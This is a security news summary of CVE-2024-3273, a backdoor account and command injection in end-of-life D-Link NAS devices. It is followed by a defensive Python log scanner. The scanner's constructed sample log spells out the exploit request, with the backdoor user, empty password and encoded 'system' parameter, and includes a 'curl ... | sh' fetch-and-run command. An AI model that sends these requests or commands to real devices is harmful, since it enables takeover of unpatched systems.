Over 92,000 exposed D-Link NAS devices have a backdoor account


April 6, 2024 at 12:04PM

A threat researcher has disclosed an arbitrary command injection combined with a hardcoded backdoor account in several end-of-life D-Link Network Attached Storage (NAS) models. Together they let a remote attacker execute arbitrary commands on the device without valid credentials, and over 92,000 affected devices are exposed on the internet. D-Link has confirmed that these models are out of support and advises users to retire or replace them immediately.

The key takeaways from the report are as follows:

1. A threat researcher, ‘Netsecfish,’ discovered a significant security flaw in multiple end-of-life D-Link NAS models. The flaw, tracked as CVE-2024-3273, consists of an arbitrary command injection and a hardcoded backdoor account; a remote attacker can chain the two to execute arbitrary commands on a vulnerable device.

2. The impacted models are the DNS-320L, DNS-325, DNS-327L and DNS-340L; the specific firmware versions affected are listed in the researcher's disclosure.

3. Despite the severity of the flaw, D-Link has confirmed that the affected devices have reached end of life and are no longer supported, so no fix will be issued. The vendor recommends retiring these products and replacing them with devices that still receive firmware updates.

4. D-Link has published a security bulletin to raise awareness about the flaw and has set up a dedicated support page for legacy devices to provide access to archived security and firmware updates.

5. Users who insist on keeping the outdated hardware in service should at least apply the latest available firmware, even though it does not address this flaw.

6. NAS devices should never be exposed directly to the internet; they are prime targets for data theft and ransomware. Keep the management interface and file shares reachable only from the local network or over a VPN, and do not port-forward them.
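Because these devices will never be patched, the practical question for anyone who still has one is whether it has already been hit. The following Python script is an added example, not code from the article, from D-Link or from Netsecfish: it scans web-server access logs for the exploitation pattern. The request shape it looks for (a GET to /cgi-bin/nas_sharing.cgi with the hardcoded messagebus account, an empty password and a base64-encoded system parameter) comes from Netsecfish's public disclosure rather than from the summary above; the log lines, IP addresses and timestamps are constructed, and the combined log format is assumed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Request shape from Netsecfish's public disclosure of CVE-2024-3273:
#   GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=<base64 command>
VULN_CGI = "/cgi-bin/nas_sharing.cgi"
BACKDOOR_USER = "messagebus"


def _b64(cmd: str) -> str:
    return base64.b64encode(cmd.encode()).decode()


def _log_line(src, ts, path, params, status, ua):
    """Build one combined-format access-log line (constructed data, not a real capture)."""
    target = f"{path}?{urlencode(params)}" if params else path
    return f'{src} - - [{ts}] "GET {target} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample log: two backdoor hits from one source, one ordinary login-page
# request, and one attempt with a non-backdoor account that the device rejected.
SAMPLE_LOG = "\n".join([
    _log_line("203.0.113.7", "06/Apr/2024:11:58:02 +0000", VULN_CGI,
              {"user": BACKDOOR_USER, "passwd": "", "cmd": "15", "system": _b64("id")},
              200, "python-requests/2.31"),
    _log_line("192.168.1.20", "06/Apr/2024:12:01:14 +0000", "/cgi-bin/login_mgr.cgi",
              {"cmd": "login"}, 200, "Mozilla/5.0"),
    _log_line("203.0.113.7", "06/Apr/2024:12:02:41 +0000", VULN_CGI,
              {"user": BACKDOOR_USER, "passwd": "", "cmd": "15",
               "system": _b64("curl http://203.0.113.9/sh | sh")},
              200, "curl/8.4.0"),
    _log_line("198.51.100.4", "06/Apr/2024:12:03:09 +0000", VULN_CGI,
              {"user": "admin", "passwd": "x", "cmd": "15", "system": _b64("ls")},
              401, "curl/8.4.0"),
])

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_system_param(value: str):
    """Decode the base64 'system' parameter; None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse_line(line: str):
    """Return a finding dict for a request to the vulnerable CGI, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != VULN_CGI:
        return None
    q = parse_qs(url.query, keep_blank_values=True)

    def first(key):
        return q.get(key, [""])[0]

    system = first("system")
    return {
        "src": m.group("src"),
        "time": m.group("ts"),
        "status": int(m.group("status")),
        # Hardcoded account with an empty password is the backdoor signature.
        "backdoor_login": first("user") == BACKDOOR_USER and first("passwd") == "",
        # Decoded command, if the request carried the injection parameter.
        "command": decode_system_param(system) if system else None,
    }


def scan_log(text: str):
    """All requests that used the backdoor account or carried a 'system' command."""
    findings = (analyse_line(line) for line in text.splitlines())
    return [f for f in findings if f and (f["backdoor_login"] or f["command"] is not None)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        tag = "BACKDOOR" if f["backdoor_login"] else "probe"
        print(f'{f["time"]} {f["src"]} {tag} HTTP {f["status"]} cmd={f["command"]!r}')
```

Run it over the NAS's own web-server log, or the log of a reverse proxy or firewall in front of it. Any backdoor-login hit answered with HTTP 200 means the attacker already had command execution on the device; at that point the data on it should be treated as exposed and the unit taken offline rather than merely firewalled.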

